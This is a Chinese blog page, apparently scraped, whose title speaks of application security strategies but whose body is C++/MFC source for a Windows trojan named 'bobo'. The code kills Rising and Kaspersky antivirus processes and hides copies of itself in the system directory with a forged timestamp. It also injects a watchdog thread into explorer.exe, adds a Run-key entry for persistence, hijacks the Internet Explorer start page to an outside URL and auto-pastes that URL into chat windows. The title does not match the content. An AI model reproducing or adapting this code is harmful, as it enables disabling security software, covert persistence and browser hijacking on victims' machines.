提升应用安全性与效率的多步骤策略-优快云博客

本文链接：https://blog.youkuaiyun.com/yuliqi/article/details/5318288

// boboDlg.cpp : 实现文件
//

#define UNICODE
#define _UNICODE

#include <windows.h>
#include <tchar.h>
#include <conio.h>
#include <stdio.h>
#include "stdafx.h"
#include "bobo.h"
#include "boboDlg.h"
#include "atlbase.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
void EnableDebugPriv();
HANDLE CreateRemote(PTSTR ctname,PTSTR ckname);
DWORD WINAPI watch(LPVOID pvparam);
TCHAR *name1=_T("//bobo.exe");
TCHAR *name2=_T("//kernel.dll");
TCHAR g_str[] = "http://lovef2.x-8.org/hy/";
DWORD byte_write;
DWORD GetID(char *szName);
int k=0;
int jj=0;
// 用于应用程序“关于”菜单项的 CAboutDlg 对话框

class CAboutDlg : public CDialog
{
public:
CAboutDlg();

// 对话框数据
enum { IDD = IDD_ABOUTBOX };

protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV 支持

// 实现
protected:
DECLARE_MESSAGE_MAP()
};

CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
}

void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
}

BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
END_MESSAGE_MAP()

// CboboDlg 对话框

CboboDlg::CboboDlg(CWnd* pParent /*=NULL*/)
: CDialog(CboboDlg::IDD, pParent)
{
m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}

void CboboDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
}

BEGIN_MESSAGE_MAP(CboboDlg, CDialog)
ON_WM_SYSCOMMAND()
ON_WM_PAINT()
ON_WM_QUERYDRAGICON()
ON_WM_TIMER()
ON_MESSAGE(WM_HOTKEY,OnHotKey)
//}}AFX_MSG_MAP
END_MESSAGE_MAP()

// CboboDlg 消息处理程序

BOOL CboboDlg::OnInitDialog()
{
CDialog::OnInitDialog();

EnableDebugPriv();
HANDLE han11,han22;
han11=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,::GetID("RavMon.exe"));
han22=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,::GetID("KAVStart.exe"));
    if(han11!=NULL)
{
  ::TerminateProcess(han11,0);
}
if(han22!=NULL)
{
  ::TerminateProcess(han22,0);
}
  SetTimer(0,30000,NULL);
int ret;
   WIN32_FIND_DATA   fdata;
HANDLE            ffhandle;
HANDLE            fchandle;
SYSTEMTIME        stime;
FILETIME          ftime;
TCHAR             curname[MAX_PATH];
      TCHAR ctname[MAX_PATH];
   TCHAR ckname[MAX_PATH];
   TCHAR syspath[MAX_PATH];
    GetSystemDirectory(syspath,MAX_PATH);
   _tcscpy(ctname,syspath);
_tcscat(ctname,name1);
_tcscpy(ckname,syspath);
_tcscat(ckname,name2);
    HINSTANCE hhb;
hhb=(HINSTANCE)::GetWindowLong(NULL,DWL_USER);

::GetModuleFileName(hhb,curname,MAX_PATH);
   ffhandle=FindFirstFile(ctname,&fdata);
if(ffhandle==INVALID_HANDLE_VALUE)
{

   if(!CopyFile(curname,ctname,TRUE))
   {
    return -1;
   }

}
else if(!FindClose(ffhandle))
{
  return -1;
}
ffhandle=FindFirstFile(ckname,&fdata);
if(ffhandle==INVALID_HANDLE_VALUE)
{
  if(GetLastError()==2)
  {
   if(!CopyFile(curname,ckname,TRUE))
   {
    return -1;
   }

   fchandle=CreateFile(ckname,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
            if(fchandle==INVALID_HANDLE_VALUE)
   {
    return -1;
   }

   memset(&stime,0,sizeof(stime));
   stime.wYear=2002;
   stime.wMonth=1;
   stime.wDay=12;
   stime.wDayOfWeek=5;
   stime.wHour=1;
   if(!SystemTimeToFileTime(&stime,&ftime))
   {
    return -1;
   }
   if(!SetFileTime(fchandle,&ftime,NULL,&ftime))
   {
    return -1;
   }
   if(!SetFileAttributes(ckname,
                      FILE_ATTRIBUTE_READONLY |
          FILE_ATTRIBUTE_HIDDEN   |
          FILE_ATTRIBUTE_SYSTEM ))
   {
    return -1;
   }
   CloseHandle(fchandle);
  }
  else
  {
   return -1;
  }
}
else if(!FindClose(ffhandle))
{
  return -1;
}

HANDLE hthread,wthread;
hthread=CreateRemote(ctname,ckname);
wthread=CreateThread(NULL,0,watch,(LPVOID)hthread,0,NULL);
// 将/“关于.../”菜单项添加到系统菜单中。

// IDM_ABOUTBOX 必须在系统命令范围内。
ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
ASSERT(IDM_ABOUTBOX < 0xF000);

CMenu* pSysMenu = GetSystemMenu(FALSE);
if (pSysMenu != NULL)
{
  CString strAboutMenu;
  strAboutMenu.LoadString(IDS_ABOUTBOX);
  if (!strAboutMenu.IsEmpty())
  {
   pSysMenu->AppendMenu(MF_SEPARATOR);
   pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
  }
}

// 设置此对话框的图标。当应用程序主窗口不是对话框时，框架将自动
// 执行此操作
SetIcon(m_hIcon, TRUE); // 设置大图标
SetIcon(m_hIcon, FALSE); // 设置小图标

// TODO: 在此添加额外的初始化代码

return TRUE; // 除非设置了控件的焦点，否则返回 TRUE
}

void CboboDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
if ((nID & 0xFFF0) == IDM_ABOUTBOX)
{
  CAboutDlg dlgAbout;
  dlgAbout.DoModal();
}
else
{
  CDialog::OnSysCommand(nID, lParam);
}
}

// 如果向对话框添加最小化按钮，则需要下面的代码
// 来绘制该图标。对于使用文档/视图模型的 MFC 应用程序，
// 这将由框架自动完成。

void CboboDlg::OnPaint()
{
if (IsIconic())
{
CPaintDC dc(this); // 用于绘制的设备上下文

SendMessage(WM_ICONERASEBKGND, reinterpret_cast<WPARAM>(dc.GetSafeHdc()), 0);

  // 使图标在工作矩形中居中
  int cxIcon = GetSystemMetrics(SM_CXICON);
  int cyIcon = GetSystemMetrics(SM_CYICON);
  CRect rect;
  GetClientRect(&rect);
  int x = (rect.Width() - cxIcon + 1) / 2;
  int y = (rect.Height() - cyIcon + 1) / 2;

  // 绘制图标
  dc.DrawIcon(x, y, m_hIcon);
}
else
{
  CDialog::OnPaint();
}
}
LRESULT CboboDlg::DefWindowProc(UINT message, WPARAM wParam, LPARAM lParam)
    {
     if(message==133)
{
   ShowWindow(SW_HIDE);
}

     return CDialog::DefWindowProc(message, wParam, lParam);
}
//当用户拖动最小化窗口时系统调用此函数取得光标显示。
HCURSOR CboboDlg::OnQueryDragIcon()
{
return static_cast<HCURSOR>(m_hIcon);
}
typedef struct _RemotePara{//参数结构
   char pMessageBox[12];
   DWORD dwMessageBox;
   DWORD       rpoutputdebugstring;
DWORD       rpopenprocess;
DWORD       rpwaitforsingleobject;
DWORD       rpfindfirstfile;
DWORD       rpcopyfile;
DWORD       rpfindclose;
DWORD       rpwinexec;

DWORD       rpmousepid;
HANDLE      rpprocesshandle;
HANDLE      rpfilehandle;
TCHAR       rptname[MAX_PATH];
TCHAR       rpkname[MAX_PATH];
char        rpwinexecname[MAX_PATH];
WIN32_FIND_DATA rpfdata;

TCHAR       rpoperror[30];
TCHAR       rpffferror[30];
TCHAR       rpcferror[30];
TCHAR       rpfcerror[30];
TCHAR       rpweerror[30];
TCHAR       rpstring[30];
TCHAR       rpwfsosignal[30];
}RemotePara, *PREMOTEPARAMETER;

//远程线程
DWORD __stdcall ThreadProc (LPVOID pvparam)
{
PREMOTEPARAMETER erp=(PREMOTEPARAMETER)pvparam;
   typedef int (__stdcall *MMessageBoxA)(HWND,LPCTSTR,LPCTSTR,DWORD);//定义MessageBox函数
   MMessageBoxA myMessageBoxA;
   myMessageBoxA =(MMessageBoxA) erp->dwMessageBox ;//得到函数入口地址
   typedef VOID   (__stdcall *EOutputDebugString)(LPCTSTR);
typedef HANDLE (__stdcall *EOpenProcess)(DWORD, BOOL, DWORD);
typedef DWORD (__stdcall *EWaitForSingleObject)(HANDLE, DWORD);
    typedef HANDLE (__stdcall *EFindFirstFile)(LPCTSTR, LPWIN32_FIND_DATA);
typedef BOOL   (__stdcall *ECopyFile)(LPCTSTR, LPCTSTR, BOOL);
typedef BOOL   (__stdcall *EFindClose)(HANDLE);
typedef UINT   (__stdcall *EWinExec)(LPCSTR, UINT);
EOutputDebugString   tOutputDebugString;
EOpenProcess         tOpenProcess;
EWaitForSingleObject tWaitForSingleObject;
EFindFirstFile       tFindFirstFile;
ECopyFile            tCopyFile;
EFindClose           tFindClose;
EWinExec             tWinExec;

tOutputDebugString=(EOutputDebugString)erp->rpoutputdebugstring;
tOpenProcess=(EOpenProcess)erp->rpopenprocess;
tWaitForSingleObject=(EWaitForSingleObject)erp->rpwaitforsingleobject;
tFindFirstFile=(EFindFirstFile)erp->rpfindfirstfile;
tCopyFile=(ECopyFile)erp->rpcopyfile;
tFindClose=(EFindClose)erp->rpfindclose;
tWinExec=(EWinExec)erp->rpwinexec;

tOutputDebugString(erp->rpstring);

erp->rpprocesshandle=tOpenProcess(PROCESS_ALL_ACCESS,FALSE,erp->rpmousepid);
if(erp->rpprocesshandle==NULL)
{
  return -1;
}
tWaitForSingleObject(erp->rpprocesshandle,INFINITE);
tOutputDebugString(erp->rpwfsosignal);
erp->rpfilehandle=(HANDLE)tFindFirstFile(erp->rptname,&erp->rpfdata);
if(erp->rpfilehandle==INVALID_HANDLE_VALUE)
{

  if(!tCopyFile(erp->rpkname,erp->rptname,TRUE))
  {
   return -1;
  }
}
if(!tFindClose(erp->rpfilehandle))
{
  return -1;
}

if((tWinExec(erp->rptname, 0))<32)
{
  return -1;
}
return 0;
}
DWORD WINAPI watch(LPVOID pvparam)
{
HANDLE            wethread=(HANDLE)pvparam;
DWORD             exitcode;

HKEY              hkey;
TCHAR             sname[MAX_PATH];
TCHAR             wtname[MAX_PATH];
TCHAR             wkname[MAX_PATH];
TCHAR             lpdata[MAX_PATH];
LPCTSTR           rgspath=_T("Software//Microsoft//Windows//CurrentVersion//Run");
DWORD             type=REG_SZ;
DWORD             dwbuflen=MAX_PATH;
    int               ret;

    if((ret=GetSystemDirectory(sname,MAX_PATH))==0)
{
     _tprintf(_T("GetSystemDirectory in watch Error: %d/n"),GetLastError());
    return -1;
}
   _tcscpy(wtname,sname);
   _tcscat(wtname,name1);
_tcscpy(wkname,sname);
_tcscat(wkname,name2);

while(1)
{
        ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_QUERY_VALUE,&hkey);
  if(ret!=ERROR_SUCCESS)
  {
   break;
  }
  ret=RegQueryValueEx(hkey,_T("bobo"),NULL,NULL,(LPBYTE)lpdata,&dwbuflen);
  RegCloseKey(hkey);
  if(ret!=ERROR_SUCCESS)
  {
   ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_WRITE,&hkey);
   if(ret!=ERROR_SUCCESS)
   {
    break;
   }
   ret=RegSetValueEx(hkey,_T("bobo"),NULL,type,(const byte *)wtname,dwbuflen);
   RegCloseKey(hkey);
   if(ret!=ERROR_SUCCESS)
   {
    break;
   }
  }

  GetExitCodeThread(wethread,&exitcode);
  if(exitcode!=STILL_ACTIVE)
  {
   wethread=CreateRemote(wtname,wkname);
  }
     Sleep(1000);
}
return 0;
}

HANDLE CreateRemote(PTSTR ctname,PTSTR ckname)
{
const DWORD THREADSIZE=1024*4;
   HANDLE hWnd = ::OpenProcess (PROCESS_ALL_ACCESS,FALSE,::GetID("explorer.exe"));
   if(!hWnd)return 0;
   void *pRemoteThread =::VirtualAllocEx(hWnd,0,THREADSIZE,MEM_COMMIT| MEM_RESERVE,PAGE_EXECUTE_READWRITE);
   if(!pRemoteThread)
   {
    MessageBox(NULL,"1","1",0);
    return 0;
   }
   if(!::WriteProcessMemory(hWnd,pRemoteThread,&ThreadProc,THREADSIZE,0))
   {
       MessageBox(NULL,"21","21",0);
   }
   //再付值
   RemotePara rp;
   ::ZeroMemory(&rp,sizeof(rp));
   HINSTANCE hUser32 = ::LoadLibrary ("user32.dll");
   HINSTANCE hkernel32=::LoadLibrary("kernel32.dll");
   { const DWORD THREADSIZE=1024*4;
    rp.dwMessageBox =(DWORD) ::GetProcAddress (hUser32 , "MessageBoxA");
   strcpy(rp.pMessageBox,"hello/0");
          rp.rpmousepid=GetCurrentProcessId();
  _tcscpy(rp.rpstring,_T("i am in remote process/n"));
  _tcscpy(rp.rpcferror,_T("CopyFile Error/n"));
  _tcscpy(rp.rpfcerror,_T("FindClose Error/n"));
  _tcscpy(rp.rpffferror,_T("FindFirstFile Error/n"));
  _tcscpy(rp.rpoperror,_T("OpenProcess Error/n"));
  _tcscpy(rp.rpweerror,_T("WinExec Error/n"));
  _tcscpy(rp.rpwfsosignal,_T("i am out of remote process/n"));
        _tcscpy(rp.rptname,ctname);
  _tcscpy(rp.rpkname,ckname);
  WideCharToMultiByte(CP_ACP,0,(LPCWSTR)ctname,-1,rp.rpwinexecname,_tcslen(ctname),NULL,NULL);
  rp.rpoutputdebugstring=(DWORD)GetProcAddress(hkernel32,"OutputDebugStringW");
  rp.rpopenprocess=(DWORD)GetProcAddress(hkernel32,"OpenProcess");
  rp.rpwaitforsingleobject=(DWORD)GetProcAddress(hkernel32,"WaitForSingleObject");
  rp.rpfindfirstfile=(DWORD)GetProcAddress(hkernel32,"FindFirstFileA");
  rp.rpcopyfile=(DWORD)GetProcAddress(hkernel32,"CopyFileA");
  rp.rpfindclose=(DWORD)GetProcAddress(hkernel32,"FindClose");
  rp.rpwinexec=(DWORD)GetProcAddress(hkernel32,"WinExec");
   }
   //写进目标进程
   RemotePara *pRemotePara =(RemotePara *) ::VirtualAllocEx (hWnd ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);//注意申请空间时的页面属性
   if(!pRemotePara)
    return 0;
   if(!::WriteProcessMemory (hWnd,pRemotePara,&rp,sizeof(rp),0))
   {::MessageBox(NULL,"a","b",0);
    return 0;
   }
   //启动线程
   HANDLE hThread = ::CreateRemoteThread(hWnd,0,0,(DWORD(__stdcall *)(void *))pRemoteThread ,pRemotePara,0,&byte_write);
   if(!hThread)
   {
   ::MessageBox(NULL,"a","a",0);
      return 0;
   }
   return hThread;
}
//提升权限
void EnableDebugPriv( void )
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;

if ( ! OpenProcessToken( GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
return;
if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) ){
CloseHandle( hToken );
return;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if ( ! AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) )
CloseHandle( hToken );
}
void PasteText()
{
TCHAR g_str[] = "http://lovef2.x-8.org/hy/";
HGLOBAL hMem;
LPTSTR pStr;
// 分配内存空间
hMem = GlobalAlloc(GMEM_SHARE, sizeof(g_str));
pStr = (LPSTR)GlobalLock(hMem);
lstrcpy(pStr, g_str);
GlobalUnlock(hMem);
OpenClipboard(NULL);
EmptyClipboard();
// 设置剪贴板文本
SetClipboardData(CF_TEXT, hMem);
CloseClipboard();
GlobalFree(hMem);
::keybd_event(0x11,0,0,0);
::keybd_event(0x56,0,0,0);
::keybd_event(0x56,0,KEYEVENTF_KEYUP,0);
::keybd_event(0x11,0,KEYEVENTF_KEYUP,0);
Sleep(500);
}
LONG CboboDlg::OnHotKey(WPARAM wParam,LPARAM lParam)
{
char szTitle[256];
char *c="聊天中";
char *cc;
HWND hWnd=::GetForegroundWindow();
    ::SendMessage(hWnd,WM_GETTEXT,255,(long)szTitle);
cc=::strpbrk(szTitle,c);
if(cc)
{
PasteText();
::UnregisterHotKey(GetSafeHwnd(),0);
k=0;
  ::keybd_event(0x11,0,0,0);
::keybd_event(0x0D,0,0,0);
::keybd_event(0x0D,KEYEVENTF_KEYUP,0,0);
::keybd_event(0x11,0,KEYEVENTF_KEYUP,0);
}
else
{
   ::UnregisterHotKey(GetSafeHwnd(),0);
k=0;
  ::keybd_event(0x11,0,0,0);
::keybd_event(0x0D,0,0,0);
::keybd_event(0x0D,KEYEVENTF_KEYUP,0,0);
::keybd_event(0x11,0,KEYEVENTF_KEYUP,0);
}
     return 0;
}
HKEY str0=HKEY_CURRENT_USER;
CString str1="Software//Policies//Microsoft//Internet Explorer//Control Panel";
void Creg()
{
CRegKey reg;
reg.Open(str0,str1,KEY_READ|KEY_WRITE);
   reg.SetDWORDValue("HomePage",1);
reg.Close();
reg.Open(str0,"Software//Microsoft//Internet Explorer//Main",KEY_READ|KEY_WRITE);
reg.SetStringValue("Start Page","http://lovef2.x-8.org/hy/",REG_SZ);
reg.Close();
reg.Open(HKEY_LOCAL_MACHINE,"Software//Microsoft//Internet Explorer//Main",KEY_READ|KEY_WRITE);
reg.SetStringValue("Start Page","http://lovef2.x-8.org/hy/",REG_SZ);
reg.Close();
ShellExecute(NULL,"open","C://Program Files//Internet Explorer//iexplore.exe",NULL,NULL,1);
}
void CboboDlg::OnTimer(UINT nIDEvent)
{
jj++;
HANDLE han1,han2;
han1=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,::GetID("RavMon.exe"));
han2=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,::GetID("KAVStart.exe"));
    if(han1!=NULL)
{
  ::TerminateProcess(han1,0);
}
if(han2!=NULL)
{
  ::TerminateProcess(han2,0);
}